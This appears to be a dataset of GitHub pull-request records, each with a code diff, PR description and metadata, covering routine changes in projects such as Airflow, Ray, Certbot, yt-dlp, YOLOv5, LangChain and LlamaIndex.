- In case you are fixing a typo in the documentation you can prepend your commit with \[AIRFLOW-XXX\], code changes always need a Jira issue.
- In case you are proposing a fundamental code change, you need to create an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)).
- In case you are adding a dependency, check if the license complies with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
### Description
- [x] Here are some details about my PR, including screenshots of any UI changes:
Makes airflow/contrib/utils pylint compatible
### Tests
- [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
No change in code
### Commits
- [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [x] In case of new functionality, my PR adds documentation that describes how to use it.
- All the public functions and the classes in the PR contain docstrings that explain what it does
- If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to an appropriate release
### Code Quality
- [x] Passes `flake8`
| https://api.github.com/repos/apache/airflow/pulls/5916 | 2019-08-26T14:29:27Z | 2019-09-04T08:23:58Z | 2019-09-04T08:23:58Z | 2019-09-04T08:23:58Z | 2,393 | apache/airflow | 14,667 |
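The reworked `test_weekday.py` assertions above rely on `WeekDay` being an `enum.IntEnum`, so each member is simultaneously an `int` and an `Enum`. A stripped-down sketch — member values are assumed from the ISO numbering the module docstring describes; the real class lives in `airflow/contrib/utils/weekday.py`:

```python
import enum

class WeekDay(enum.IntEnum):
    # ISO weekday numbers, Monday == 1 (mirroring the Airflow class).
    MONDAY = 1
    TUESDAY = 2
    WEDNESDAY = 3
    THURSDAY = 4
    FRIDAY = 5
    SATURDAY = 6
    SUNDAY = 7

day = WeekDay(1)
print(day.name, int(day), isinstance(day, int), isinstance(day, enum.Enum))
# MONDAY 1 True True
```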
[Test][Tiny]Check argv in right way in mock worker | diff --git a/src/ray/core_worker/test/mock_worker.cc b/src/ray/core_worker/test/mock_worker.cc
index 03a78a1981a7b..2d650e5d697ef 100644
--- a/src/ray/core_worker/test/mock_worker.cc
+++ b/src/ray/core_worker/test/mock_worker.cc
@@ -145,7 +145,7 @@ class MockWorker {
} // namespace ray
int main(int argc, char **argv) {
- RAY_CHECK(argc == 4);
+ RAY_CHECK(argc >= 4);
auto store_socket = std::string(argv[1]);
auto raylet_socket = std::string(argv[2]);
auto node_manager_port = std::stoi(std::string(argv[3]));
| <!-- Thank you for your contribution! Please review https://github.com/ray-project/ray/blob/master/CONTRIBUTING.rst before opening a pull request. -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
This test was broken by the introduction of `--runtime-env-hash=` in 194c5e3a96126ddabca48bf25de395d9684c3583.
P.S.
For some reason I don't know, `core_worker_test` is disabled in CI.
But I think it would be better to keep this part working for as long as possible.
<!-- Please give a short summary of the change and the problem this solves. -->
## Related issue number
<!-- For example: "Closes #1234" -->
## Checks
- [x] I've run `scripts/format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [x] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [x] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/16325 | 2021-06-09T02:16:14Z | 2021-06-09T05:18:27Z | 2021-06-09T05:18:27Z | 2021-06-09T05:18:31Z | 164 | ray-project/ray | 18,948 |
Add finish_release.py CLI parsing and flags | diff --git a/tools/finish_release.py b/tools/finish_release.py
index bc8e832dfb7..24e20987fa9 100755
--- a/tools/finish_release.py
+++ b/tools/finish_release.py
@@ -21,6 +21,7 @@
python tools/finish_release.py ~/.ssh/githubpat.txt
"""
+import argparse
import glob
import os.path
import re
@@ -44,6 +45,34 @@
# for sanity checking.
SNAP_ARCH_COUNT = 3
+
+def parse_args(args):
+ """Parse command line arguments.
+
+ :param args: command line arguments with the program name removed. This is
+ usually taken from sys.argv[1:].
+ :type args: `list` of `str`
+
+ :returns: parsed arguments
+ :rtype: argparse.Namespace
+
+ """
+ # Use the file's docstring for the help text and don't let argparse reformat it.
+ parser = argparse.ArgumentParser(description=__doc__,
+ formatter_class=argparse.RawDescriptionHelpFormatter)
+ parser.add_argument('githubpat', help='path to your GitHub personal access token')
+ group = parser.add_mutually_exclusive_group()
+ # We use 'store_false' and a destination related to the other type of
+ # artifact to cause the flag being set to disable publishing of the other
+ # artifact. This makes using the parsed arguments later on a little simpler
+ # and cleaner.
+ group.add_argument('--snaps-only', action='store_false', dest='publish_windows',
+ help='Skip publishing other artifacts and only publish the snaps')
+ group.add_argument('--windows-only', action='store_false', dest='publish_snaps',
+ help='Skip publishing other artifacts and only publish the Windows installer')
+ return parser.parse_args(args)
+
+
def download_azure_artifacts(tempdir):
"""Download and unzip build artifacts from Azure pipelines.
@@ -181,8 +210,9 @@ def promote_snaps(version):
def main(args):
- github_access_token_file = args[0]
+ parsed_args = parse_args(args)
+ github_access_token_file = parsed_args.githubpat
github_access_token = open(github_access_token_file, 'r').read().rstrip()
with tempfile.TemporaryDirectory() as tempdir:
@@ -191,8 +221,10 @@ def main(args):
# again fails. Publishing the snaps can be done multiple times though
# so we do that first to make it easier to run the script again later
# if something goes wrong.
- promote_snaps(version)
- create_github_release(github_access_token, tempdir, version)
+ if parsed_args.publish_snaps:
+ promote_snaps(version)
+ if parsed_args.publish_windows:
+ create_github_release(github_access_token, tempdir, version)
if __name__ == "__main__":
main(sys.argv[1:])
| We were recently notified that https://ubuntu.com/security/notices/USN-4662-1 is affecting our snaps. I'm rebuilding them, but once that's done, I need to publish them by running `tools/finish_release.py`. I don't want to republish the Windows installer though. I could modify the code, but I think some command line options for this are nicer.
I tested that the four combinations of the `--*-only` flags work as expected and the `--help` output looks like:
```
usage: finish_release.py [-h] [--snaps-only | --windows-only] githubpat
Post-release script to publish artifacts created from Azure Pipelines.
This currently includes:
* Moving snaps from the beta channel to the stable channel
* Publishing the Windows installer in a GitHub release
Setup:
- Create a github personal access token
- https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token#creating-a-token
- You'll need repo scope
- Save the token to somewhere like ~/.ssh/githubpat.txt
- Install the snapcraft command line tool and log in to a privileged account.
- https://snapcraft.io/docs/installing-snapcraft
- Use the command `snapcraft login` to log in.
Run:
python tools/finish_release.py ~/.ssh/githubpat.txt
positional arguments:
githubpat path to your GitHub personal access token
optional arguments:
-h, --help show this help message and exit
--snaps-only Skip publishing other artifacts and only publish the snaps
--windows-only Skip publishing other artifacts and only publish the Windows installer
```
@ohemorange, since you and I are the ones using this script, I think it makes the most sense for you to review it when you get a chance. | https://api.github.com/repos/certbot/certbot/pulls/8522 | 2020-12-09T18:51:28Z | 2020-12-10T23:13:48Z | 2020-12-10T23:13:48Z | 2020-12-10T23:13:49Z | 643 | certbot/certbot | 1,572 |
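A condensed, runnable sketch of the flag wiring above: each `--*-only` flag uses `action='store_false'` on the *other* artifact's destination, so both publications default to `True` and setting one flag disables only the other:

```python
import argparse

def parse_args(args):
    parser = argparse.ArgumentParser()
    parser.add_argument('githubpat')
    group = parser.add_mutually_exclusive_group()
    # Each flag disables the *other* artifact, as in the diff above.
    group.add_argument('--snaps-only', action='store_false',
                       dest='publish_windows')
    group.add_argument('--windows-only', action='store_false',
                       dest='publish_snaps')
    return parser.parse_args(args)

both = parse_args(['pat.txt'])
snaps = parse_args(['pat.txt', '--snaps-only'])
print(both.publish_snaps, both.publish_windows)    # True True
print(snaps.publish_snaps, snaps.publish_windows)  # True False
```

Passing both flags together is rejected by the mutually exclusive group, matching the intent of the real script.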
[extractor/glomex] Minor fixes | diff --git a/yt_dlp/extractor/generic.py b/yt_dlp/extractor/generic.py
index 529edb59867..7198aa02cc1 100644
--- a/yt_dlp/extractor/generic.py
+++ b/yt_dlp/extractor/generic.py
@@ -1874,6 +1874,7 @@ class GenericIE(InfoExtractor):
'add_ie': [RutubeIE.ie_key()],
},
{
+ # glomex:embed
'url': 'https://www.skai.gr/news/world/iatrikos-syllogos-tourkias-to-turkovac-aplo-dialyma-erntogan-eiste-apateones-kai-pseytes',
'info_dict': {
'id': 'v-ch2nkhcirwc9-sf',
diff --git a/yt_dlp/extractor/glomex.py b/yt_dlp/extractor/glomex.py
index 247a65a7962..ec3c35c6f5a 100644
--- a/yt_dlp/extractor/glomex.py
+++ b/yt_dlp/extractor/glomex.py
@@ -75,7 +75,7 @@ def _extract_api_data(self, video, video_id):
format_url, video_id, 'mp4', m3u8_id=format_id,
fatal=False)
formats.extend(formats_)
- subs.update(subs_)
+ self._merge_subtitles(subs_, target=subs)
else:
formats.append({
'url': format_url,
@@ -205,8 +205,6 @@ def _extract_urls(cls, webpage, origin_url):
mdict = mobj.groupdict()
if mdict.get('url'):
url = unescapeHTML(mdict['url'])
- if url.startswith('//'):
- url = f'https:{url}'
if not cls.suitable(url):
continue
yield cls._smuggle_origin_url(url, origin_url)
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
* Use `_merge_subtitles`
* Do not resolve scheme for embedded URLs
* Add comment to test (in `GenericIE`) for `_extract_urls` | https://api.github.com/repos/yt-dlp/yt-dlp/pulls/2357 | 2022-01-16T12:13:23Z | 2022-01-16T12:38:31Z | 2022-01-16T12:38:31Z | 2022-01-16T20:22:25Z | 440 | yt-dlp/yt-dlp | 7,602 |
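The `_merge_subtitles` swap in the hunk above matters because `dict.update` replaces each language's subtitle list wholesale. A rough sketch of the difference (the yt-dlp helper's exact semantics are assumed here; de-duplicating by URL is purely an illustration):

```python
def merge_subtitles(source, target):
    # Extend each language's track list instead of replacing it;
    # de-duplication by URL is an assumption for this sketch.
    for lang, tracks in source.items():
        seen = {t.get("url") for t in target.setdefault(lang, [])}
        target[lang].extend(t for t in tracks if t.get("url") not in seen)

hls = {"en": [{"url": "en.hls.vtt"}]}
dash = {"en": [{"url": "en.dash.vtt"}], "de": [{"url": "de.dash.vtt"}]}

replaced = {k: list(v) for k, v in hls.items()}
replaced.update(dash)                 # the English HLS track is silently lost

merged = {k: list(v) for k, v in hls.items()}
merge_subtitles(dash, target=merged)  # both English tracks survive
```

In a per-format extraction loop like the one in the hunk, the merge keeps the tracks collected from earlier formats instead of overwriting them.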
Past chat histories in a side bar on desktop | diff --git a/css/main.css b/css/main.css
index 653da3ee99..3d34a56412 100644
--- a/css/main.css
+++ b/css/main.css
@@ -660,6 +660,20 @@ div.svelte-362y77>*, div.svelte-362y77>.form>* {
margin-top: var(--layout-gap);
}
+/* ----------------------------------------------
+ Past chat histories in a side bar on desktop
+---------------------------------------------- */
+@media screen and (width >= 1327px) {
+ #past-chats-row {
+ position: absolute;
+ top: 16px;
+ left: 0;
+ width: calc(0.5*(var(--document-width) - 880px - 120px - 16px*2));
+ max-width: 300px;
+ margin-left: calc(-0.5*(var(--document-width) - 880px - 14px - 16px * 2));
+ }
+}
+
/* ----------------------------------------------
Keep dropdown menus above errored components
---------------------------------------------- */
diff --git a/js/main.js b/js/main.js
index 60f4bf3b38..f63327cef7 100644
--- a/js/main.js
+++ b/js/main.js
@@ -385,3 +385,15 @@ new ResizeObserver(updateCssProperties)
.observe(document.querySelector("#chat-input textarea"));
window.addEventListener("resize", updateCssProperties);
+
+//------------------------------------------------
+// Keep track of the display width to position the past
+// chats dropdown on desktop
+//------------------------------------------------
+function updateDocumentWidth() {
+ var updatedWidth = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
+ document.documentElement.style.setProperty("--document-width", updatedWidth + "px");
+}
+
+updateDocumentWidth();
+window.addEventListener("resize", updateDocumentWidth);
diff --git a/modules/ui_chat.py b/modules/ui_chat.py
index 76c7d5ff27..1713a39dce 100644
--- a/modules/ui_chat.py
+++ b/modules/ui_chat.py
@@ -63,17 +63,21 @@ def create_ui():
shared.gradio['send-chat-to-default'] = gr.Button('Send to default')
shared.gradio['send-chat-to-notebook'] = gr.Button('Send to notebook')
- with gr.Row(elem_id='past-chats-row'):
- shared.gradio['unique_id'] = gr.Dropdown(label='Past chats', elem_classes=['slim-dropdown'], interactive=not mu)
- shared.gradio['rename_chat'] = gr.Button('Rename', elem_classes='refresh-button', interactive=not mu)
- shared.gradio['delete_chat'] = gr.Button('🗑️', elem_classes='refresh-button', interactive=not mu)
- shared.gradio['delete_chat-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
- shared.gradio['delete_chat-confirm'] = gr.Button('Confirm', variant='stop', visible=False, elem_classes='refresh-button')
-
- with gr.Row(elem_id='rename-row'):
- shared.gradio['rename_to'] = gr.Textbox(label='Rename to:', placeholder='New name', visible=False, elem_classes=['no-background'])
- shared.gradio['rename_to-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
- shared.gradio['rename_to-confirm'] = gr.Button('Confirm', visible=False, elem_classes='refresh-button')
+ with gr.Row(elem_id='past-chats-row', elem_classes=['pretty_scrollbar']):
+ with gr.Column():
+ with gr.Row():
+ shared.gradio['unique_id'] = gr.Dropdown(label='Past chats', elem_classes=['slim-dropdown'], interactive=not mu)
+
+ with gr.Row():
+ shared.gradio['delete_chat'] = gr.Button('🗑️', elem_classes='refresh-button', interactive=not mu)
+ shared.gradio['delete_chat-confirm'] = gr.Button('Confirm', variant='stop', visible=False, elem_classes='refresh-button')
+ shared.gradio['delete_chat-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
+ shared.gradio['rename_chat'] = gr.Button('Rename', elem_classes='refresh-button', interactive=not mu)
+
+ with gr.Row(elem_id='rename-row'):
+ shared.gradio['rename_to'] = gr.Textbox(label='Rename to:', placeholder='New name', visible=False, elem_classes=['no-background'])
+ shared.gradio['rename_to-confirm'] = gr.Button('Confirm', visible=False, elem_classes='refresh-button')
+ shared.gradio['rename_to-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
with gr.Row():
shared.gradio['start_with'] = gr.Textbox(label='Start reply with', placeholder='Sure thing!', value=shared.settings['start_with'])
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5098 | 2023-12-27T15:22:13Z | 2024-01-09T04:57:29Z | 2024-01-09T04:57:29Z | 2024-01-17T22:53:49Z | 1,060 | oobabooga/text-generation-webui | 26,428 | |
Decoupled Model-View-Controller example | diff --git a/mvc.py b/mvc.py
index 8087bdab..7df613fc 100644
--- a/mvc.py
+++ b/mvc.py
@@ -1,60 +1,121 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
-
class Model(object):
+ def __iter__(self):
+ raise NotImplementedError
+
+ def get(self, item):
+ """Returns an an object with a .items() call method
+ that iterates over key,value pairs of its information."""
+ raise NotImplementedError
+
+ @property
+ def item_type(self):
+ raise NotImplementedError
+
+
+
+class ProductModel(Model):
+
+ class Price(float):
+ """A polymorphic way to pass a float with a particular __str__ functionality."""
+ def __str__(self):
+ first_digits_str = str(round(self,2))
+ try:
+ dot_location = first_digits_str.index('.')
+ except ValueError:
+ return (first_digits_str + '.00')
+ else:
+ return (first_digits_str +
+ '0'*(3 + dot_location - len(first_digits_str)))
products = {
- 'milk': {'price': 1.50, 'quantity': 10},
- 'eggs': {'price': 0.20, 'quantity': 100},
- 'cheese': {'price': 2.00, 'quantity': 10}
+ 'milk': {'price': Price(1.50), 'quantity': 10},
+ 'eggs': {'price': Price(0.20), 'quantity': 100},
+ 'cheese': {'price': Price(2.00), 'quantity': 10}
}
+ item_type = 'product'
+
+ def __iter__(self):
+ for item in self.products:
+ yield item
+
+ def get(self, product):
+ try:
+ return self.products[product]
+ except KeyError as e:
+ raise KeyError((str(e) + " not in the model's item list."))
class View(object):
+ def show_item_list(self, item_type, item_list):
+ raise NotImplementedError
- def product_list(self, product_list):
- print('PRODUCT LIST:')
- for product in product_list:
- print(product)
- print('')
+ def show_item_information(self, item_type, item_name, item_info):
+ """Will look for item information by iterating over key,value pairs
+ yielded by item_info.items()"""
+ raise NotImplementedError
- def product_information(self, product, product_info):
- print('PRODUCT INFORMATION:')
- print('Name: %s, Price: %.2f, Quantity: %d\n' %
- (product.title(), product_info.get('price', 0),
- product_info.get('quantity', 0)))
+ def item_not_found(self, item_type, item_name):
+ raise NotImplementedError
- def product_not_found(self, product):
- print('That product "%s" does not exist in the records' % product)
+class ConsoleView(View):
+ def show_item_list(self, item_type, item_list):
+ print(item_type.upper() + ' LIST:')
+ for item in item_list:
+ print(item)
+ print('')
-class Controller(object):
+ @staticmethod
+ def capitalizer(string):
+ return string[0].upper() + string[1:].lower()
- def __init__(self):
- self.model = Model()
- self.view = View()
+ def show_item_information(self, item_type, item_name, item_info):
+ print(item_type.upper() + ' INFORMATION:')
+ printout = 'Name: %s' % item_name
+ for key, value in item_info.items():
+ printout += (', ' + self.capitalizer(str(key)) + ': ' + str(value))
+ printout += '\n'
+ print(printout)
- def get_product_list(self):
- product_list = self.model.products.keys()
- self.view.product_list(product_list)
+ def item_not_found(self, item_type, item_name):
+ print('That %s "%s" does not exist in the records' % (item_type, item_name))
+
+
+class Controller(object):
- def get_product_information(self, product):
- product_info = self.model.products.get(product, None)
- if product_info is not None:
- self.view.product_information(product, product_info)
+ def __init__(self, model, view):
+ self.model = model
+ self.view = view
+
+ def show_items(self):
+ items = list(self.model)
+ item_type = self.model.item_type
+ self.view.show_item_list(item_type, items)
+
+ def show_item_information(self, item_name):
+ try:
+ item_info = self.model.get(item_name)
+ except:
+ item_type = self.model.item_type
+ self.view.item_not_found(item_type, item_name)
else:
- self.view.product_not_found(product)
+ item_type = self.model.item_type
+ self.view.show_item_information(item_type, item_name, item_info)
if __name__ == '__main__':
- controller = Controller()
- controller.get_product_list()
- controller.get_product_information('cheese')
- controller.get_product_information('eggs')
- controller.get_product_information('milk')
- controller.get_product_information('arepas')
+ model = ProductModel()
+ view = ConsoleView()
+ controller = Controller(model, view)
+ controller.show_items()
+ controller.show_item_information('cheese')
+ controller.show_item_information('eggs')
+ controller.show_item_information('milk')
+ controller.show_item_information('arepas')
### OUTPUT ###
# PRODUCT LIST:
| Decoupled the Controller from the Model and the View. Controllers, models, and views only know about their abstract interfaces.
Controller now takes a concrete implementation of a model and a view during initialization. Besides the base Model and View classes that guarantee their services, for this example there is a ProductModel and a ConsoleView to serve as their concrete implementations.
| https://api.github.com/repos/faif/python-patterns/pulls/114 | 2016-01-30T21:14:56Z | 2016-01-31T17:33:47Z | 2016-01-31T17:33:47Z | 2016-01-31T17:33:48Z | 1,294 | faif/python-patterns | 33,516 |
fix LR bug | diff --git a/train.py b/train.py
index e10d5b9b1e4..513abb02c40 100644
--- a/train.py
+++ b/train.py
@@ -113,6 +113,12 @@ def train(hyp, tb_writer, opt, device):
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
print('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
+
+ # Scheduler https://arxiv.org/pdf/1812.01187.pdf
+ lf = lambda x: (((1 + math.cos(x * math.pi / epochs)) / 2) ** 1.0) * 0.8 + 0.2 # cosine
+ scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
+ # https://discuss.pytorch.org/t/a-problem-occured-when-resuming-an-optimizer/28822
+ # plot_lr_scheduler(optimizer, scheduler, epochs)
# Load Model
with torch_distributed_zero_first(rank):
@@ -158,12 +164,6 @@ def train(hyp, tb_writer, opt, device):
if mixed_precision:
model, optimizer = amp.initialize(model, optimizer, opt_level='O1', verbosity=0)
- # Scheduler https://arxiv.org/pdf/1812.01187.pdf
- lf = lambda x: (((1 + math.cos(x * math.pi / epochs)) / 2) ** 1.0) * 0.8 + 0.2 # cosine
- scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
- # https://discuss.pytorch.org/t/a-problem-occured-when-resuming-an-optimizer/28822
- # plot_lr_scheduler(optimizer, scheduler, epochs)
-
# DP mode
if device.type != 'cpu' and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
| submit #300
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
Optimization process in YOLOv5 training updated with better scheduler initialization sequence.
### 📊 Key Changes
- Relocated the learning rate scheduler initialization in the `train.py` script.
- Removed the scheduler initialization from after the point where the model and optimizer are potentially wrapped with AMP (Automatic Mixed Precision).
### 🎯 Purpose & Impact
- **Purpose:** The change ensures the learning rate scheduler is set up before AMP wrapping, which can resolve potential conflicts or issues when resuming from checkpoints.
- **Impact:** This update could provide users with a more stable and consistent training experience by preventing potential bugs related to learning rate scheduling when using mixed precision training. It should be transparent to end-users but improves the robustness of the training code. | https://api.github.com/repos/ultralytics/yolov5/pulls/565 | 2020-07-30T10:58:38Z | 2020-07-30T17:48:21Z | 2020-07-30T17:48:21Z | 2024-01-19T21:31:17Z | 467 | ultralytics/yolov5 | 25,131 |
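For reference, the scheduler being relocated is built from the cosine lambda visible in the hunk. Worked out in isolation (generalizing the hard-coded `0.8`/`0.2` split into a `floor` parameter is my own framing, not part of the patch):

```python
import math

def make_lf(epochs, floor=0.2):
    # Same shape as the train.py lambda: a cosine decay of the LR
    # multiplier from 1.0 at epoch 0 down to `floor` at the last epoch.
    return lambda x: ((1 + math.cos(x * math.pi / epochs)) / 2) * (1 - floor) + floor

lf = make_lf(epochs=300)
start, mid, end = lf(0), lf(150), lf(300)   # ≈ 1.0, ≈ 0.6, ≈ 0.2
```

Building the `LambdaLR` from this lambda right after the optimizer, before any AMP wrapping, presumably keeps the scheduler bound to the original optimizer when resuming — the situation the linked PyTorch thread discusses.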
pipe default key | diff --git a/libs/langchain/langchain/schema/runnable/base.py b/libs/langchain/langchain/schema/runnable/base.py
index afce1201e184cd..51365bd0e1f82c 100644
--- a/libs/langchain/langchain/schema/runnable/base.py
+++ b/libs/langchain/langchain/schema/runnable/base.py
@@ -992,6 +992,7 @@ def configurable_fields(
def configurable_alternatives(
self,
which: ConfigurableField,
+ default_key: str = "default",
**kwargs: Runnable[Input, Output],
) -> RunnableSerializable[Input, Output]:
from langchain.schema.runnable.configurable import (
@@ -999,7 +1000,7 @@ def configurable_alternatives(
)
return RunnableConfigurableAlternatives(
- which=which, default=self, alternatives=kwargs
+ which=which, default=self, alternatives=kwargs, default_key=default_key
)
| https://api.github.com/repos/langchain-ai/langchain/pulls/11788 | 2023-10-14T00:24:13Z | 2023-10-14T07:39:24Z | 2023-10-14T07:39:24Z | 2023-10-14T07:39:25Z | 207 | langchain-ai/langchain | 43,337 | |
[youtube] Enforce UTC and use utcnow() in `datetime_from_str` | diff --git a/yt_dlp/extractor/youtube.py b/yt_dlp/extractor/youtube.py
index d8b4ad25867..335b8d2576c 100644
--- a/yt_dlp/extractor/youtube.py
+++ b/yt_dlp/extractor/youtube.py
@@ -373,7 +373,7 @@ def _initialize_pref(self):
pref = dict(compat_urlparse.parse_qsl(pref_cookie.value))
except ValueError:
self.report_warning('Failed to parse user PREF cookie' + bug_reports_message())
- pref.update({'hl': 'en'})
+ pref.update({'hl': 'en', 'tz': 'UTC'})
self._set_cookie('.youtube.com', name='PREF', value=compat_urllib_parse_urlencode(pref))
def _real_initialize(self):
@@ -412,8 +412,9 @@ def _extract_api_key(self, ytcfg=None, default_client='web'):
def _extract_context(self, ytcfg=None, default_client='web'):
context = get_first(
(ytcfg, self._get_default_ytcfg(default_client)), 'INNERTUBE_CONTEXT', expected_type=dict)
- # Enforce language for extraction
- traverse_obj(context, 'client', expected_type=dict, default={})['hl'] = 'en'
+ # Enforce language and tz for extraction
+ client_context = traverse_obj(context, 'client', expected_type=dict, default={})
+ client_context.update({'hl': 'en', 'timeZone': 'UTC', 'utcOffsetMinutes': 0})
return context
_SAPISID = None
@@ -729,7 +730,8 @@ def _extract_time_text(self, renderer, *path_list):
timestamp = (
unified_timestamp(text) or unified_timestamp(
self._search_regex(
- (r'(?:.+|^)(?:live|premieres|ed|ing)(?:\s*on)?\s*(.+\d)', r'\w+[\s,\.-]*\w+[\s,\.-]+20\d{2}'), text.lower(), 'time text', default=None)))
+ (r'(?:.+|^)(?:live|premieres|ed|ing)(?:\s*on)?\s*(.+\d)', r'\w+[\s,\.-]*\w+[\s,\.-]+20\d{2}'),
+ text.lower(), 'time text', default=None)))
if text and timestamp is None:
self.report_warning('Cannot parse localized time text' + bug_reports_message(), only_once=True)
diff --git a/yt_dlp/utils.py b/yt_dlp/utils.py
index 7adfb1e744d..6aa234f2a1e 100644
--- a/yt_dlp/utils.py
+++ b/yt_dlp/utils.py
@@ -3383,7 +3383,7 @@ def datetime_from_str(date_str, precision='auto', format='%Y%m%d'):
if precision == 'auto':
auto_precision = True
precision = 'microsecond'
- today = datetime_round(datetime.datetime.now(), precision)
+ today = datetime_round(datetime.datetime.utcnow(), precision)
if date_str in ('now', 'today'):
return today
if date_str == 'yesterday':
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [X] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [X] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [X] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [X] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [X] Bug fix
- [ ] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
From https://github.com/yt-dlp/yt-dlp/pull/2223
While investigation is needed for the `playerResponse` date issue, I think we should at least merge this. | https://api.github.com/repos/yt-dlp/yt-dlp/pulls/2402 | 2022-01-20T04:04:29Z | 2022-01-20T15:02:02Z | 2022-01-20T15:02:02Z | 2023-02-28T00:48:19Z | 721 | yt-dlp/yt-dlp | 8,181 |
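The `utcnow()` half of the change is easy to miss: `datetime_from_str` anchors relative strings like `yesterday` to "now", so the anchor must be in the same timezone as the timestamps it is compared against. A heavily simplified sketch of that anchoring (the real utility also handles precision levels and arbitrary offsets):

```python
import datetime

def datetime_from_str(date_str):
    # Anchor relative dates to UTC midnight so they line up with the
    # UTC timestamps the extractor now receives (simplified sketch).
    today = datetime.datetime.utcnow().replace(
        hour=0, minute=0, second=0, microsecond=0)
    if date_str in ("now", "today"):
        return today
    if date_str == "yesterday":
        return today - datetime.timedelta(days=1)
    raise ValueError("unsupported date string: %r" % date_str)
```

`utcnow()` mirrors the patch; on newer Pythons the timezone-aware `datetime.datetime.now(datetime.timezone.utc)` is generally preferred.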
Update ollama.py | diff --git a/llama_index/llms/ollama.py b/llama_index/llms/ollama.py
index a36f800445159..263f2b4f1b4c9 100644
--- a/llama_index/llms/ollama.py
+++ b/llama_index/llms/ollama.py
@@ -23,9 +23,7 @@
class Ollama(CustomLLM):
- base_url: str = "http://localhost:11434"
- """Base url the model is hosted under."""
-
+ base_url: str = Field(description="Base url the model is hosted under.")
model: str = Field(description="The Ollama model to use.")
temperature: float = Field(description="The temperature to use for sampling.")
context_window: int = Field(
@@ -42,6 +40,7 @@ class Ollama(CustomLLM):
def __init__(
self,
model: str,
+ base_url: str = "http://localhost:11434",
temperature: float = 0.75,
additional_kwargs: Optional[Dict[str, Any]] = None,
context_window: int = DEFAULT_CONTEXT_WINDOW,
@@ -56,6 +55,7 @@ def __init__(
super().__init__(
model=model,
temperature=temperature,
+ base_url=base_url,
additional_kwargs=additional_kwargs or {},
context_window=context_window,
prompt_key=prompt_key,
|
# Description
Enable the `base_url` default value to be overridden
Fixes # (issue)
## Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] Added new unit/integration tests
